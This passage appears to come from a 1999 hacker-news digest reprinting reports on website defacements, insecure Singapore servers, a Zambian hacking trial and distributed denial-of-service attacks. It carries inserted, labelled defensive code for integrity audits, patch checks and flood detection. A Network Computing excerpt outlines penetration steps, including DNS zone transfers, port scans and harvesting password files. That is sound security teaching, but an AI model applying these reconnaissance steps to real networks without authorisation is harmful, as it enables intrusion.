``It means to me there is no security policy for this site,'' said Russ Cooper, a specialist who runs the popular NTBugtraq discussion group on the Internet to expose security problems. ``It's typically unfortunate that a lot of these people do not take the time to protect themselves from this kind of embarrassment.''

Another expert, Weld Pond, said there was ``no question'' that the Bush campaign neglected to remove these remnants of computer code, which made the site vulnerable.

``That's probably how they got in,'' said Pond, a consultant with L0pht Heavy Industries of Boston. ``The fact that there are these sample files on there is pretty problematic, meaning they didn't take much effort to secure it.''

Tucker said the campaign's own investigation found that the altered Web page was accessible by the public for fewer than five minutes before a backup system kicked in and restored the vandalized text with a fresh copy.

``The image wasn't subtle,'' said Jeremy Pinnix, a director at a Nashville, Tenn., design company who captured a snapshot of the vandalized Web site.
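Both problems the AP story describes, vendor sample files left in the web root and a page replaced under the administrators' noses, are caught by the same control: record a manifest of the released files and compare the live tree against it. The following is an added example written for this issue, not anything the campaign or its hosting provider ran. The web root is a constructed temporary directory, and the directory names treated as vendor sample content are a placeholder policy, not the files the AP reporters saw.

```python
"""Manifest-based integrity audit of a web root.

Added example with a constructed web root. At release time the operator
records a SHA-256 per file (build_manifest); later audits report files
that changed, disappeared, or were never part of the release, and flag
anything living under directory names that vendors use for sample content.
"""
import hashlib
import os
import shutil
import tempfile

# Placeholder policy: directory names that should never ship in production.
SAMPLE_DIR_NAMES = {"samples", "examples", "demo"}


def sha256_file(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Map each file (relative POSIX path) under root to its SHA-256."""
    manifest = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def audit(root, manifest):
    """Compare the live tree with the release manifest."""
    current = build_manifest(root)
    modified = sorted(p for p in manifest if p in current and current[p] != manifest[p])
    missing = sorted(p for p in manifest if p not in current)
    unexpected = sorted(p for p in current if p not in manifest)
    sample_content = sorted(
        p for p in current
        if any(part.lower() in SAMPLE_DIR_NAMES for part in p.split("/")[:-1])
    )
    return {
        "modified": modified,
        "missing": missing,
        "unexpected": unexpected,
        "sample_content": sample_content,
        "clean": not (modified or missing or unexpected or sample_content),
    }


def _write(root, rel, text):
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as fh:
        fh.write(text)


def demo():
    """Build a constructed web root, record its manifest, then simulate
    a leftover sample directory and a replaced front page."""
    root = tempfile.mkdtemp(prefix="webroot-")
    try:
        _write(root, "index.asp", "<html>campaign front page</html>\n")
        _write(root, "news/story1.htm", "<html>news story</html>\n")
        manifest = build_manifest(root)   # what the release should contain
        before = audit(root, manifest)    # nothing has changed yet
        _write(root, "samples/readme.asp", "<!-- vendor sample, should not be here -->\n")
        _write(root, "index.asp", "<html>defaced</html>\n")
        after = audit(root, manifest)
        return before, after
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    before, after = demo()
    print("before:", before)
    print("after:", after)
```

Run on a schedule from a host other than the web server, this gives an alert rather than the silent overwrite the campaign's backup system performed: the restore put the page back, but nobody was told that anything had been changed, which is why the webmaster was still "trying to find out whether we had a visitor" hours later.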
He said he notified the Bush campaign immediately, but ``they didn't really seem too worried.''

Before Vice President Al Gore's campaign acquired the Web address for its Internet site, www.algore2000.com, a spokesman said the previous owner published a blurred photo of Gore with the message: ``Should Al Gore be president? It's a little unclear (get it?)''

Wired;

George W. Bush the Red?
by Declan McCullagh
12:55 p.m. 19.Oct.99.PDT

Intruders apparently defaced the official campaign site of Republican presidential candidate George W. Bush early Tuesday, replacing a photo of the Texas governor with a bright red hammer and sickle.

Visitors said the modified Web site, which quoted socialist literature and linked to the International Communist League, was visible around 9:15 a.m. EDT.

Campaign officials spent the morning trying to puzzle out exactly what happened, a task made more difficult by the fact that the Web server automatically copied over the hacked page with the original one.

"We're trying to find out whether we had a visitor. Indications are that we had a visitor," said Greg Sedberry, georgewbush.com webmaster.

This isn't the first time a presidential contender has been embarrassed. Vice President Al Gore's campaign site was hacked on 10 April.

"Gore was broken into in April. That's the only one I know of in the 2000 race," said B.K. DeLong, curator of the defacement archive at attrition.org.

On Monday, the campaign introduced a newly designed Web site, switching from a single Unix server to multiple computers running Windows NT and Microsoft's Web server.

"I inherited that Unix box when I came on board [in July]," Sedberry said. "I took that box and said we need a more robust setup. It was developed from scratch, and that's where the problems can arise."

The campaign's NT machines are co-located at Austin-based Illuminati Online, which says it hosts 2,000 customer Web sites.

"The George W. Bush machines are not under our control. They maintain everything on those machines," said an Illuminati Online engineer.

Jeremy Pinnix, webmaster of Nashville-based Anderson Thomas Design, said he noticed the hacked site early Tuesday.

"I called them [the campaign] right away. They asked me to do a screen capture and to email it to them. I haven't heard back, but when I refreshed, it had been fixed," he said.

"Our first battle plan is to figure out exactly what happened," said campaign spokeswoman Mindy Tucker. "This is obviously a problem that anyone who has a Web site faces."

Sedberry said the NT machines are load-balanced, and the master Web server copies files every few minutes to the duplicate ones.

"We're going through the whole system saying, 'Are we sure we locked that down?'" said campaign webmaster Sedberry. "We're finishing it up, double-checking, triple-checking. And we'll see."

According to a screen snapshot, the hacked site quoted the International Communist League's belief that "we must take the Marxist doctrine of proletarian revolution out of the realm of theory and give it reality."

@HWA

27.0 Space Rogue, Editor of HNN, on ABC News Webcast Today
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by weld pond

Space Rogue from HNN will be interviewed today in a live webcast with Sam Donaldson. The subject is "Who hacks computers, and why?". Also appearing will be William Marlow, executive vice president of Global Integrity, a company that advises other companies on hackers/crackers.

Sam Donaldson Live!
- The show will be archived for later viewing
http://www.abcnews.go.com/onair/DailyNews/SamDonaldson_Index.html

@HWA

28.0 20% of Hosts in Singapore Vulnerable
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by lamer

When the local Singaporean newspaper, The Sunday Times, asked IT security firm Infinitum to check on the vulnerability of local systems they found that fully one fifth of .sg addresses were vulnerable to attack. Infinitum found 13,000 registered .sg addresses with almost 8,000 actually connected to the net. The scan revealed that of those 8,000 sites 1,833 were running with outdated or unpatched software leaving them vulnerable to cyber attack.

The Straits Times
http://web3.asia1.com.sg/archive/st/0/cyb/cyb1_1017.html

OCT 17 1999

Many servers easy prey to hackers

A check by an IT security firm reveals nearly 25 per cent of servers with .sg addresses are using flawed software with holes hackers can exploit easily

By SAMANTHA SANTA MARIA

MORE than a fifth of nearly 8,000 operational Internet servers here are using flawed software that would allow hackers to enter in under a minute.

The 1,833 servers hosting websites which have .sg in their addresses are either using old software riddled with holes hackers can exploit, or newer software in which the holes have not been "patched" with security-enhancing updates.

This is against a backdrop of 70 per cent of the servers here using one program or another which is known to have security flaws.

This is what local IT security firm Infinitum found in a check done for The Sunday Times. The servers include those which host the websites of government departments, Internet service providers and educational institutions.

Security consultants said that it is alarming that more than a fifth of Singapore's Internet servers are insecure. The situation suggests that the people running these systems do not know about the security lapses or do not know how to fix them.
They noted that users find faults in Internet server software all the time and the software vendors come up with remedies, or "patches". But there is cause to worry if people looking after computer systems here are not spotting the flaws and patching them up as and when they are found.

Mr Tom Cervenka, a US-based network penetrator whose job is to test security, said most intrusion attempts could be thwarted by site managers who pay attention to security issues and update the protection for their sites regularly. He said: "The problem seems to be a shortage of administrators who do this."

The problem is not exclusive to Singapore, said the consultants. Security awareness is generally low worldwide. A spokesman for an Israeli IT firm, Voltaire, said: "Systems administrators don't seem to have a firm grasp on security issues, no matter where they are."

The Sunday Times asked Infinitum to run the check after local websites were defaced, and several hackers cited the lack of security in Singapore websites as a reason for why they are targetted.

Infinitum's check showed that there are almost 13,000 websites whose domain name ends with .sg, and of these, close to 8,000 are operational. It used an easily available program to poll the .sg servers on what software was being used to publish their web pages. The company then assessed the security of the software based on known vulnerabilities in the server software.

It found about 40 per cent of the servers use a freely distributed program by a non-profit organisation called Apache. A Sunday Times check shows that the National University of Singapore, the Internal Revenue Authority of Singapore and Sony Music's local office are among them.

The second most popular software is Microsoft's Internet Information Server. This is used by almost 30 per cent of the servers here. It is understood that the Singapore Management University, People's Association and Harry's Bar are also among the software's users.
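The check the article describes, polling each server for the software it announces and comparing that against known problem versions, reduces to parsing the HTTP Server header and comparing version numbers against a patch baseline; the same logic is what an administrator runs over their own inventory to find the unpatched fifth before a newspaper does. This is an added example, not Infinitum's tool. The HTTP responses are constructed, and the versions in PATCH_BASELINE are placeholders that show the comparison, not a statement about which Apache or IIS releases were vulnerable in 1999.

```python
"""Assess web server software from stored HTTP response headers.

Added example. Responses are constructed; PATCH_BASELINE is a placeholder
policy (product -> minimum acceptable version), not real vulnerability data.
"""
import re

# Constructed policy: anything below these versions is reported as outdated.
PATCH_BASELINE = {
    "apache": (1, 3, 9),
    "microsoft-iis": (4, 0),
}

# Constructed response headers for six hosts in an inventory.
RESPONSES = {
    "www.alpha.example.sg": "HTTP/1.1 200 OK\r\nServer: Apache/1.3.6 (Unix)\r\nContent-Type: text/html\r\n\r\n",
    "www.beta.example.sg": "HTTP/1.1 200 OK\r\nServer: Apache/1.3.9 (Unix) PHP/3.0.12\r\n\r\n",
    "www.gamma.example.sg": "HTTP/1.1 200 OK\r\nserver: Microsoft-IIS/3.0\r\n\r\n",
    "www.delta.example.sg": "HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/4.0\r\n\r\n",
    "www.epsilon.example.sg": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n",
    "www.zeta.example.sg": "HTTP/1.1 200 OK\r\nServer: Netscape-Enterprise/3.6\r\n\r\n",
}

# "Product/1.2.3 ..." -> product name and dotted version at the start of the value
PRODUCT_RE = re.compile(r"^([A-Za-z][\w.-]*)/(\d+(?:\.\d+)*)")


def server_header(raw_response):
    """Return the Server header value, or None if the host does not send one."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "server":
            return value.strip()
    return None


def parse_product(value):
    """Split 'Apache/1.3.6 (Unix)' into ('apache', (1, 3, 6)); None if unparsable."""
    m = PRODUCT_RE.match(value)
    if not m:
        return None
    return m.group(1).lower(), tuple(int(x) for x in m.group(2).split("."))


def is_outdated(version, minimum):
    """Tuple comparison with zero padding, so '4' and '4.0' compare equal."""
    width = max(len(version), len(minimum))
    pad = lambda v: v + (0,) * (width - len(v))
    return pad(version) < pad(minimum)


def assess(responses, baseline=PATCH_BASELINE):
    """Classify each host as outdated, current or unknown against the baseline.

    Hosts with no Server header, an unparsable one, or a product the baseline
    does not cover land in "unknown" and are excluded from the fraction, so a
    hidden banner is never silently counted as "current".
    """
    result = {"outdated": {}, "current": {}, "unknown": {}}
    for host, raw in responses.items():
        value = server_header(raw)
        parsed = parse_product(value) if value else None
        if parsed is None or parsed[0] not in baseline:
            result["unknown"][host] = value
            continue
        product, version = parsed
        bucket = "outdated" if is_outdated(version, baseline[product]) else "current"
        result[bucket][host] = (product, ".".join(map(str, version)))
    assessed = len(result["outdated"]) + len(result["current"])
    result["fraction_outdated"] = len(result["outdated"]) / assessed if assessed else 0.0
    return result


if __name__ == "__main__":
    report = assess(RESPONSES)
    for bucket in ("outdated", "current", "unknown"):
        for host, info in report[bucket].items():
            print(f"{bucket:8s} {host}: {info}")
    print(f"fraction outdated among assessed hosts: {report['fraction_outdated']:.0%}")
```

The "unknown" bucket matters more than it looks: servers that strip or rewrite the Server header are invisible to a survey like this, so the article's 70 per cent figure is a lower bound on servers running software with known flaws, and a banner-only check is no substitute for a patch inventory taken on the host itself.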
@HWA

29.0 Zambia's First Computer Crime Trial
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

The Lusaka, Zambia government's State House web site was altered on July 7, 1999 and the intrusion was not noticed until 10 days later. Patrick Mkandawire was charged and arrested for violating the country's Telecommunications Act. His lawyer has argued that that law does not apply to his client's crimes. The court has yet to make its final ruling in this case.

Africa News
http://library.northernlight.com/FD19991018120000062.html?cb=0&dx=1006&sc=0#doc

Story Filed: Monday, October 18, 1999 8:12 PM EST

LUSAKA (Zambia) (African Eye News Service, October 17, 1999) - Zambia's first computer hacker appeared in a packed Lusaka courtroom this week after he allegedly cracked the government's State House website and replaced President Frederick Chiluba's photo with an unflattering cartoon, African Eye News Service (South Africa) reports.

Internet data processing manager Patrick Mkandawire allegedly hacked into the government internet site on July 7 but it took officials ten full days, until July 17, to notice he had replaced Chiluba's official portrait with the "insulting" cartoon.

Mkandawire's attorney, Clement Michello, did not deny that his client had hacked the site but insisted that Zambia did not yet have the laws to prosecute anyone for computer hacking.

"The country simply doesn't have laws regulating mischief on the internet and my client has therefore been irregularly charged," he said.

Mkandawire was charged and arrested for violating the country's Telecommunications Act, which only regulated the activities of the state-owned Zambia Telecommunications Company Limited (ZAMTEL). It makes no direct reference to the Internet or websites.
Michello conceded that computer hacking was covered by the draft 1998 Law Development Computer Bill but he stressed that the Bill was still being finalised by the country's Law Development Commission and had not yet even been tabled for debate in Parliament.

"How can anyone be charged under a non-existent law? This Bill will only have authority once it has been approved and enacted," he said.

The draft Bill provides for the registration of computers and prohibits unauthorised access, alterations or modification of data stored on computers.

Warning that any attempt to prosecute Mkandawire using the Bill would be unconstitutional, Michello demanded that all charges against Mkandawire be quashed. "My client should be released immediately," he said.

Prosecutor John Katongo rejected Mkandawire's defence, insisting that the Telecommunications Act provided for the establishment of a Communications Authority which was in turn responsible for licensing Internet Service Providers (ISP). The government website, and Chiluba's portrait, was hosted on one of these service providers, Zamnet, and were therefore subject to the law, he said.

"Mkandawire has been charged for interfering in the telecommunications service provided by Zamnet and we are therefore fully within our rights to demand that he be punished," said Katongo.

The court will rule on Michello's objections to the charges next Monday.

Online. Copyright © 1999 African Eye News Service. Distributed via Africa News

@HWA

30.0 Russian Infowar Debunked
     ~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Omega

Is Russia on the verge of cyber attack as people in the FBI and the US Military would have you believe? Or is this more saber rattling to secure funding for their anti-cyber terrorism efforts? (Definitely a good read. Makes you think twice about those comments from Michael Vatis and Gen. Hamre.)
PBS
http://www.pbs.org/cringely/pulpit/pulpit19991014.html

I'm From the Government, Trust Me
Why Russia Probably Isn't Invading U.S. Government web Sites and Even if They are, It Doesn't Matter

By Robert X. Cringely

Twenty years ago, I was working as an investigator for the Presidential Commission on the Accident at Three Mile Island. I was trying to help piece together what caused that nuclear power plant to almost go kablooey. The commission chairman was John Kemeny, inventor of the Basic programming language and then president of Dartmouth College. Back then, as now, nuclear safety was a hot news item, and the Commission was suffering from a news leak. So they called in the security consultants -- men in white belts and white shoes who seemed to be always chomping on unlit cigars. The consultants installed an elaborate system of monitors and guards meant to keep our secrets secret. When asked exactly who they were trying to keep from breaking in to the building, the chief white shoe said, "Why the Washington Post, of course."

The Post, which had been breaking all those TMI stories, never had a budget for burglary. They never needed one. In the case of Three Mile Island, all it took was picking up a few bar tabs at some corner dive. But you could never convince the security consultants of this, since it would mean that their jobs couldn't be justified. And that's the moral of this story: Always consider the personal interests of people who say we are in danger and should pay them to do something to protect us.

What brought all of this back to mind after two decades was reading a number of news stories about supposed Russian infiltration of web sites in the U.S. government. To read these stories, it sounds pretty dire, like we are enduring a Russian cyber invasion. Those complaining seem to be the U.S military and the FBI. What a load of hogwash!

Read the stories. What secrets have been lost? Well, none, but there has been lots of "sensitive data" transferred overseas. Sensitive data? What the heck does that mean? It means someone wants us to pay for something that doesn't require doing.

First let's deal with the difference between secrets and non-secrets. The U.S. government is absolutely mad for secrecy. It has hundreds of levels and types of secrecy, and has a tendency to declare as secret almost anything it considers to have value. Most U.S. secrets aren't worthy of being called secrets, yet they are. Is any of this "sensitive data" secret? Is it classified information? No. So the U.S. government has already decided that it doesn't really matter who reads this stuff. So why should we care, then, if some of the readers are from Russia? U.S. rules say that if something is classified as secret, it can't be held on a computer that is reachable over the Internet.

So what we have lost apparently has little value, okay, but maybe what so worries our spooks is the volume of attacks from Russia or wherever. If that's the case, let's consider for a moment how search engines work. Excite, Alta Vista, Hotbot, Google, and all the rest use spider programs that go around the net, find web content, and drag it back to be indexed. All of these search engines -- dozens of them -- claim to be scouring the Internet on a daily basis. This means that they access every web server in Russia many times per day. Hey, doesn't that sound like an attack? Is Excite invading Russia? It also means they access every web server in the U.S. many times per day, including all the web servers holding that so-called "sensitive data." Is Alta Vista attacking U.S. security?

So maybe the Russian Academy of Sciences is developing a search engine. Do we have any idea whether it is accessing U.S. web sites that contain other than sensitive data? We don't know anything, because it is not in the interest of these alarmists to share with us that knowledge.
We make information available on the Internet -- a global network -- then raise an alarm when that information is actually accessed. What is wrong with this picture? Of course, it is okay for us to do it, we are the good guys, remember? The CIA and the NSA visit every site they can on every server in every country including those we consider friendly. Is the CIA invading Australia? Regularly. Somebody in the FBI or the U.S. military (or both) wants either to expand the definition of what is an official secret to include the hot lunch menu at your local elementary school, or they want more money for expanding their anti-cyber terrorism efforts. That is why these stories appear, not because there is any actual threat. This has to do with regulations or appropriations, but it doesn't have to do with real security. Information that is declared to be for public consumption ought to be for public consumption anywhere. From a data security standpoint, such accesses are actually very good. They show us what is of interest to those we are afraid might become our enemies. And if those enemies actually DO find a nugget of real information in all that HTML, then they will have helped us make our systems better the next time. If there is a real data security story worth paying attention to, it's the IPv6 debate over whether every Internet packet should indicate the very PC upon which it originated. This is another weird situation where privacy proponents are up against those who advocate the protection of intellectual property. But I think the real situation is far different. Some of it is institutional paranoia, sure. But some of it is just busywork: The Internet Engineering Task Force decided 128 bits were needed for future Internet addresses, and they just couldn't bring themselves to allow any of those bits to go unused. We won't actually need 128 bits for decades, maybe centuries, but the idea of allowing some of them to just stay set at zero rankles engineers. 
So just for the heck of it, they decided to use 64 of those bits to designate the data source right down to the NIC address. Is it stupid? Yes. Should it worry us? No. Our workaround to this point for the limitations of IP addressing has been to invent a variety of proxy and masquerading systems to allow a bunch of folks on a local area network to share a single IP address -- even if that address is dynamically assigned by a DHCP server at Earthlink. The same thing will happen with IPv6, though in reverse. Somebody will start a business to make all those individual IP addresses look like a single address. Problem solved. And you can bet it WON'T be solved by anyone with matching white belt and shoes.

@HWA

31.0 Distributed Coordinated Attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by AlienPlague
A new style of DOS attacks, dubbed 'distributed coordinated attacks', may be the future of denial of service attacks. The new attack style, which has been seen a 'handful' of times over the past few weeks, is harder to detect and stop, mainly because, as the name implies, the attacks originate from more than one server.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2376768,00.html?chkpt=hpqsnewstest

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Cyber attacks -- both old and new
By Robert Lemos, ZDNN
October 19, 1999 3:53 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2376768,00.html

ARLINGTON, Va. -- Over the past six weeks, U.S. network servers have come under assault by a fundamentally new style of computer attack, said experts here at the National Information Systems Security Conference.
Known as "distributed coordinated attacks," this new style is particularly good at defeating present-day defenses against those intent on stopping Internet traffic to a particular company or Internet service -- a result known as denial of service. "It's possible to detect the attack, but it is very hard to block it" using current software, said Thomas Longstaff, senior technical researcher for Software Engineering Institute at Carnegie Mellon University, during a panel presentation Tuesday.

A garden-variety denial-of-service attack uses a single server to attempt to tie up a network's connection, denying its users access to or from the Internet. Distributed coordinated attacks, however, use hundreds or thousands of servers co-opted by a malicious programmer to tag-team a single server. Because so many servers are used, each attack can be camouflaged as a legitimate connection attempt, making it difficult for the victim's intrusion software to identify that it is under attack and impossible to identify just who is attacking. "Typically, you block the single network address that is attacking you," said Longstaff, whose group works with the Computer Emergency Response Team Coordination Center at Carnegie Mellon. CERT/CC tracks and responds to network attacks. "By spreading out the attack over a large number of addresses, it becomes much harder to deal with."

A 'handful' of attacks

Longstaff and others have already locked horns with intruders using the distributed coordinated method of attack. In the past six weeks, a "handful of sites" have been attacked, taking them off the Internet for an unspecified amount of time, he said. He would not give any more details. Getting the access necessary to compromise hundreds of servers is not as difficult as it sounds, said Barbara Fraser, consulting engineer to the CTO at Cisco Systems Inc.
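The detection gap Longstaff describes, worked as an added example that is not from the ZDNet article or from CERT/CC: a C routine that counts connection attempts per source against one target inside a sliding window and separates a single-source flood (caught by the usual per-address rule) from a distributed one, which only shows up in the number of distinct sources. The window length, the thresholds and the sample addresses are constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>

/* Window and thresholds: constructed values for the demonstration, not
   figures from the article. */
#define WINDOW_SECS   10   /* length of the sliding window in seconds */
#define SINGLE_RATE   50   /* one source alone at this rate = classic DoS */
#define DISTINCT_SRCS 20   /* this many sources on one target = distributed */
#define MAX_SRCS      256

/* One connection attempt as a sensor might log it: arrival second,
   source address, destination address. */
struct conn { long ts; const char *src; const char *dst; };

struct verdict {
    int classic;      /* one source exceeds SINGLE_RATE: block that address */
    int distributed;  /* many sources, each looking legitimate on its own */
    int distinct;     /* distinct sources seen against the target */
    int max_per_src;  /* busiest single source */
};

/* Count attempts against `target` in (now-WINDOW_SECS, now] per source and
   classify. A per-address rule ("block the single network address") only
   ever sees max_per_src; the distributed verdict needs the aggregate. */
struct verdict evaluate_window(const struct conn *c, size_t n,
                               const char *target, long now)
{
    const char *srcs[MAX_SRCS];
    int counts[MAX_SRCS];
    int nsrc = 0;
    struct verdict v = {0, 0, 0, 0};

    for (size_t i = 0; i < n; i++) {
        if (strcmp(c[i].dst, target) != 0) continue;
        if (c[i].ts <= now - WINDOW_SECS || c[i].ts > now) continue;
        int j;
        for (j = 0; j < nsrc; j++)
            if (strcmp(srcs[j], c[i].src) == 0) break;
        if (j == nsrc) {
            if (nsrc == MAX_SRCS) break;     /* table full: stop counting */
            srcs[nsrc] = c[i].src;
            counts[nsrc++] = 0;
        }
        counts[j]++;
    }
    for (int j = 0; j < nsrc; j++)
        if (counts[j] > v.max_per_src) v.max_per_src = counts[j];
    v.distinct = nsrc;
    v.classic = v.max_per_src >= SINGLE_RATE;
    v.distributed = !v.classic && nsrc >= DISTINCT_SRCS;
    return v;
}

/* Constructed sample traffic (addresses from documentation ranges). */
#define TARGET "192.0.2.10"
static char src_names[MAX_SRCS][16];
static struct conn sample[MAX_SRCS];

/* Build `nsrc` sources each making `per_src` attempts inside the window
   that starts at t=100, then evaluate the window ending at now=109. */
static struct verdict run_scenario(int nsrc, int per_src)
{
    size_t n = 0;
    for (int s = 0; s < nsrc; s++) {
        snprintf(src_names[s], sizeof src_names[s], "203.0.113.%d", s + 1);
        for (int k = 0; k < per_src && n < MAX_SRCS; k++) {
            sample[n].ts  = 100 + (k % WINDOW_SECS);
            sample[n].src = src_names[s];
            sample[n].dst = TARGET;
            n++;
        }
    }
    return evaluate_window(sample, n, TARGET, 109);
}

struct verdict check_classic(void)     { return run_scenario(1, 60); } /* one host hammering */
struct verdict check_distributed(void) { return run_scenario(30, 2); } /* 30 hosts, 2 each */
struct verdict check_benign(void)      { return run_scenario(5, 1); }  /* ordinary visitors */

int main(void)
{
    struct verdict v = check_distributed();
    printf("distinct=%d max_per_src=%d classic=%d distributed=%d\n",
           v.distinct, v.max_per_src, v.classic, v.distributed);
    return 0;
}
```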
With "always on" connections to the home becoming more and more common, the number of insecure computers connected to the Internet full-time is increasing. "With the average home user knowing very little about security, this problem is going to get worse," she stressed. In addition, hackers are more frequently automating the software used to gain access to systems through known exploits. A whole host of programs exist to scan networks connected to the Internet for previously discovered security holes that system administrators have not patched.

Attacks 'lowest common denominator'

"This method attacks the lowest common denominator in security," said CERT's Longstaff. "It will never be hard to find a thousand servers that don't have the most up-to-date patches." In fact, prevention may rely more on protecting computers from being used by malicious programmers, rather than protecting the target, he said. Stephen Cobb, vice president of research and education for InfoSec Labs Inc., stressed that network attackers, be they hackers or criminals bent on espionage or terrorism, have only temporarily thwarted the security software. "The security arena is a steady progression of more sophisticated attacks followed by better defenses," he said. "There is an evolution at work here." The conference, put on by the National Institute of Standards and Technology, collects the United States' foremost professionals in network security. A glance through the attendee list shows that more than one attendee out of every 10 is an analyst for the computer-focused National Security Agency.

@HWA

32.0 Possible Network Intrusion Scenario
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Q Bahl
This is a fairly decent article that outlines how an intruder might break into a mixed NT/Unix environment. It covers zone transfers, DMZ models, password sniffing/cracking, nmap, and other well-known tools and techniques.
The author actually understands that one must have root before they can install back doors. Network Computing http://www.networkcomputing.com/1021/1021ws1.html Anatomy of a Network Intrusion October 18, 1999 By Greg Shipley Empty Red Bull cans litter the floor, reflecting the warm glow of the monitors. Alongside the sketch boards lie drained liters of Mountain Dew, partially eaten burritos and dozens of 486 machines configured as Linux Beowulf clusters. A Pentium II machine plugged into a seemingly endless line of surge suppressors hums as it continues to brute-force password guesses at a rate of 10 million per second. Only 12 more hours to go... All the machines have their lids off--no hard-core geek is ever satisfied with the state of a system. Legal pads are covered with IP addresses, penciled network maps and port numbers. As the attackers' scripts relentlessly scan for the presence of the recently identified CGI vulnerability, they continue to exchange notes with the crew on IRC (Internet Relay Chat). They figure once they've compromised a few dozen ISPs--creating a network of "stepping stones"--they can forge ahead to their target. It's all about buffer space--a disposable safety net with a redo button. If they "own" a dozen machines between them and their target, they can attack with the confidence that only a cyborg in a time machine could ever gather enough info to snag them--only a handful of organizations have the manpower or expertise to catch intruders who leave no trail. Attack, clean, reattack--and gain as much net space as possible. Auditor? Cracker? Strung-out administrator? The roles can be interchanged and the distinction blurred, with one exception: The crackers have the easiest task. They need find only one open doorway; the defenders must check every lock. "It takes one to know one" may be cliché, but it holds up in the network security arena. Understanding how attackers operate is invaluable--in fact, it's your best defense. 
The concept of "hacking" into your own network for security purposes isn't new. Dan Farmer published a paper in 1995 entitled "Securing Your Site by Breaking Into It" (www.fish.com/security/admin-guide-to-cracking.html). Network Computing published a similar article a few years ago (see "Intrusion Detection Provides a Pound of Prevention" at www.networkcomputing.com/815/815ws1.html). Many of the time-tested security principles still hold true. However, attackers' tools and talent have taken giant leaps. Each time security products mature, so do attack methodologies, and if you fall behind on either, you're setting yourself up for a nightmare.

Cracking Some Myths

Before we even think about sitting down in front of a computer, let's debunk some common assumptions about crackers and excuses for reduced vigilance.

"We are not a high-profile company--no one is targeting us." You may manufacture industrial-strength toilet seats, but be "next door," in Internet terms, to an e-commerce site performing credit-card processing. Or maybe you have great bandwidth or juicy servers, or maybe your domain name just sounds cool. It often doesn't matter what your company is or does; intruders can make use of your network even if it isn't their final target.

"That is a really complicated attack--it would never happen to us." Although experts agree that the successful cracker lies somewhere between script kiddy (able to execute prewritten code, but unable to manufacture new exploit code) and elite programmer, most are able to pull off fairly sophisticated attacks. Think back to your college years. Imagine spending less time drinking beer and more time in front of your terminal. What level of mischief could you achieve? Now add the declining prices of bandwidth and hardware and it's no wonder 14-year-olds are drawing visits from the Secret Service.

@HWA

33.0 Intrusion Detection Provides A Pound Of Prevention
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

By Mark Abene, Gerald L.
Kovacich and Steven Lutz

Attacks on systems and networks have skyrocketed as rapidly changing technology, systems integration, global networks, information warfare and hacker boredom have become prevalent. Is your network next? Have you been hit already?

In the past, teams of friendly attackers, known as "Tiger Teams," would test the security of systems and networks. Today, teams like this and friendly attacks by both internal information systems security (InfoSec) staff and consultancies have branched out. We have put together such a venture. Our team attempts to penetrate a system or an organization's network by taking on the role of attacker. Using an external attack approach, the team typically performs "zero-knowledge" attacks, meaning the team is given only the name of the target organization. Sometimes the client provides the team with the names or the types of systems or information management is most concerned about. Targets can include payroll and human resources departments, fund transfers, proprietary data (such as product designs and source code) and customer databases. The clients are varied: manufacturing, health care and pharmaceuticals companies and major financial institutions.

Here we discuss our attack and intrusion-detection procedures and offer an approach to intrusion prevention. In addition, we present the methodology used to analyze individual system security and show you how to strengthen intrusion detection using commonly available tools. For more specific information concerning the attack systems and tools used, see "Test Systems and Tools" and "Specific System Attack," on Network Computing Online at www.NetworkComputing.com/815/815ws1.html.

Playing the Hacker

Our methodology of attack is similar to that of a would-be attacker. It begins with exploring and mapping the target organization's Internet connections.
We start with whois queries to the Internet Network Information Center (InterNIC) to determine domain information, namely Domain Name System (DNS) servers. We attempt to map the internal network topology using DNS queries. Typically, we request a DNS zone transfer from the organization's authoritative name servers. Although most commercial firewalls can block this type of probe, a surprising number of organizations don't implement the block. Next, using traceroute, we try to uncover possible candidates for a firewall host or packet-filtering router, which would reveal itself as the last hop before our probe packets begin to get dropped. We make a note of this machine's address for reference.

With the DNS zone transfers as a guide, we attempt to find supposedly untrusted machines, just outside the firewall. Most administrators are not overly concerned with security on external machines because these are considered sacrificial machines, relegated to a demilitarized zone. However, these same administrators open their firewalls to permit any type of network traffic coming from these sacrificial machines to connect to machines behind the firewall--either as a convenience to themselves or because of an oversight. Another problem we see all too frequently is that the untrusted DNS server, though outside the firewall, contains the organization's complete DNS maps. Properly configured, it should contain maps only for those hosts that the Internet-at-large needs to know about, such as the DNS server, the external mail gateway, and possibly, the company's Web site.

Using strobe to perform port scans on these external machines, we can note any and all system services that can be reached for possible exploitation. If we are successful at breaking into any of these machines on the outside of the firewall, we make note of all valid user names in the password file and see if there are any machines mentioned in the hosts file that weren't listed in our DNS maps.
